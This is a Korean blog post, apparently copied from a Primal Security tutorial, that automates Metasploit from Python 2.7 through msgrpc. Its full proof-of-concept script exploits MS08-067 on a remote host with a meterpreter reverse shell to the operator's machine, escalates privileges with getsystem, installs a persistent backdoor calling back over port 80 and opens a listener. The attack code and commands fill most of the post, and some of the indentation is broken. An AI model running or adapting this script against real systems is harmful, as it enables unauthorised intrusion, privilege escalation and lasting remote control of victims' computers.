[primalsecurity] 0xA – Python for Metasploit Automation

« 2025/02 »
일	월	화	수	목	금	토
						1
2	3	4	5	6	7	8
9	10	11	12	13	14	15
16	17	18	19	20	21	22
23	24	25	26	27	28

Archives

250x250

Recent Posts

Link

관리 메뉴

0w0

[primalsecurity] 0xA – Python for Metasploit Automation 본문

Primalsecurity/Primalsecurity_Python-tutorials

[primalsecurity] 0xA – Python for Metasploit Automation

0w0 2019. 12. 31. 01:53

728x90

환경 : 칼리리눅스, 파이썬 2.7

pymsf 모듈로 python과 Metasploit’s msgrpc를 활용

msfrpc 패스워드 설정

msf5 > load msgrpc Pass=toor

1
2
3
4
5
6
7
8

root@root:~# msfconsole
 
msf5 > load msgrpc Pass=toor
[*] MSGRPC Service:  127.0.0.1:55552 
[*] MSGRPC Username: msf
[*] MSGRPC Password: toor
[*] Successfully loaded plugin: msgrpc
msf5 > 

msfrpc은 msfconsole로 명령하는 것처럼 수행됨

msgrpg 클래스 생성 -> msgrpc 서버 접속 및 가상 콘솔 생성 -> 명령 수행

call 생성 및 메소드 수행

1. client.call('console.write',[console_id,commands]) #명령 전달

2. res = client.call('console.read',[console_id]) #명령 결과를 res 변수에 저장

msgrpg 클래스 생성 -> msgrpc 서버 접속 및 가상 콘솔 생성

1
2
3
4
5

def sploiter(RHOST, LHOST, LPORT, session):
    client = msfrpc.Msfrpc({})
    client.login('msf', '123')
    ress = client.call('console.create')
    console_id = ress['id']

call 생성 및 메소드 수행

1. client.call('console.write',[console_id,commands]) #명령 전달

2. res = client.call('console.read',[console_id]) #명령 결과를 res 변수에 저장

1
2
3
4
5
6
7
8
9
10
11
12
13

## Exploit MS08-067 ##
commands = """use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST """+RHOST+"""
set LHOST """+LHOST+"""
set LPORT """+LPORT+"""
set ExitOnSession false
exploit -z
"""
print "[+] Exploiting MS08-067 on: "+RHOST
client.call('console.write',[console_id,commands])
res = client.call('console.read',[console_id])
result = res['data'].split('n')

msg 리소스 파일 생성

resource<PathToFile> : 명령 저장 파일, 파일로부터 읽어들여 명령을 실행

getsystem : 권한상승

run persistence : LHOST:PORT 연결, 백도어 생성

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

# Function to create the MSF .rc files
def builder(RHOST, LHOST, LPORT):
     post = open('/tmp/smbpost.rc', 'w')
     bat = open('/tmp/ms08067_install.bat', 'w')
 
     postcomms = """getsystem
run persistence -S -U -X -i 10 -p 80 -r """+LHOST+"""
cd c:\
upload /tmp/ms08067_patch.exe c:\
upload /tmp/ms08067_install.bat c:\
execute -f ms08067_install.bat
"""
     batcomm = "ms08067_patch.exe /quiet"
     post.write(postcomms); bat.write(batcomm)
     post.close(); bat.close()

/tmp/smbpost.rc, rc 파일을 이용해서

msg=>post/multi/gather/run_console_rc-ile 모듈의 인터프리터 세션 명령을 실행

console.write와 console.read를 사용해서 명령 전달 및 결과값 확인 가능

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

## Run Post-exploit script ##
runPost = """use post/multi/gather/run_console_rc_file
set RESOURCE /tmp/smbpost.rc
set SESSION """+session+"""
exploit
"""
     print "[+] Running post-exploit script on: "+RHOST
     client.call('console.write',[console_id,runPost])
     rres = client.call('console.read',[console_id])
## Setup Listener for presistent connection back over port 80 ##
     sleep(10)
     listen = """use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 80
set LHOST """+LHOST+"""
exploit
"""
print "[+] Setting up listener on: "+LHOST+":80"
client.call('console.write',[console_id,listen])
lres = client.call('console.read',[console_id])
print lres

optparse 모듈로 RHOST, LHOST, LPORT 등의 변수들의 커맨드라인 생성

PoC 코드

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86

import os, msfrpc, optparse, sys, subprocess
from time import sleep
 
# Function to create the MSF .rc files
def builder(RHOST, LHOST, LPORT):
     post = open('/tmp/smbpost.rc', 'w')
     bat = open('/tmp/ms08067_install.bat', 'w')
 
     postcomms = """getsystem
run persistence -S -U -X -i 10 -p 80 -r """+LHOST+"""
cd c:\
upload /tmp/ms08067_patch.exe c:\
upload /tmp/ms08067_install.bat c:\
execute -f ms08067_install.bat
"""
     batcomm = "ms08067_patch.exe /quiet"
     post.write(postcomms); bat.write(batcomm)
     post.close(); bat.close()
 
# Exploits the chain of rc files to exploit MS08-067, setup persistence, and patch
def sploiter(RHOST, LHOST, LPORT, session):
     client = msfrpc.Msfrpc({})
        client.login('msf', '123')
        ress = client.call('console.create')
        console_id = ress['id']
 
## Exploit MS08-067 ##
     commands = """use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST """+RHOST+"""
set LHOST """+LHOST+"""
set LPORT """+LPORT+"""
set ExitOnSession false
exploit -z
"""
     print "[+] Exploiting MS08-067 on: "+RHOST
     client.call('console.write',[console_id,commands])
     res = client.call('console.read',[console_id])
     result = res['data'].split('n')
 
## Run Post-exploit script ##
     runPost = """use post/multi/gather/run_console_rc_file
set RESOURCE /tmp/smbpost.rc
set SESSION """+session+"""
exploit
"""
     print "[+] Running post-exploit script on: "+RHOST
     client.call('console.write',[console_id,runPost])
     rres = client.call('console.read',[console_id])
## Setup Listener for presistent connection back over port 80 ##
     sleep(10)
     listen = """use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 80
set LHOST """+LHOST+"""
exploit
"""
     print "[+] Setting up listener on: "+LHOST+":80"
     client.call('console.write',[console_id,listen])
     lres = client.call('console.read',[console_id])
     print lres
 
def main():
        parser = optparse.OptionParser(sys.argv[0] +
        ' -p LPORT -r RHOST -l LHOST')
        parser.add_option('-p', dest='LPORT', type='string', 
        help ='specify a port to listen on')
        parser.add_option('-r', dest='RHOST', type='string', 
        help='Specify a remote host')
        parser.add_option('-l', dest='LHOST', type='string', 
        help='Specify a local host')
     parser.add_option('-s', dest='session', type='string', 
        help ='specify session ID')
     (options, args) = parser.parse_args()
     session=options.session
     RHOST=options.RHOST; LHOST=options.LHOST; LPORT=options.LPORT
 
     if (RHOST == None) and (LPORT == None) and (LHOST == None):
                print parser.usage
                sys.exit(0)
 
     builder(RHOST, LHOST, LPORT)
     sploiter(RHOST, LHOST, LPORT, session)
 
if __name__ == "__main__":
      main()

728x90

저작자표시 비영리 변경금지

'Primalsecurity > Primalsecurity_Python-tutorials' 카테고리의 다른 글

[primalsecurity] 0xC – Python Malware (0)	2020.01.01
[primalsecurity] 0xB – Pseudo-Terminal (가짜 터미널) (0)	2020.01.01
[primalsecurity] 0x9 – Command Automation (0)	2019.12.31
[primalsecurity] 0x8 – Whois Automation (0)	2019.12.31
[primalsecurity] 0x7 – Web Scanning and Exploitation (0)	2019.12.24

공유하기 링크

페이스북
카카오스토리
트위터

'Primalsecurity/Primalsecurity_Python-tutorials' Related Articles

Comments

0w0

[primalsecurity] 0xA – Python for Metasploit Automation 본문

[primalsecurity] 0xA – Python for Metasploit Automation

'Primalsecurity > Primalsecurity_Python-tutorials' 카테고리의 다른 글

티스토리툴바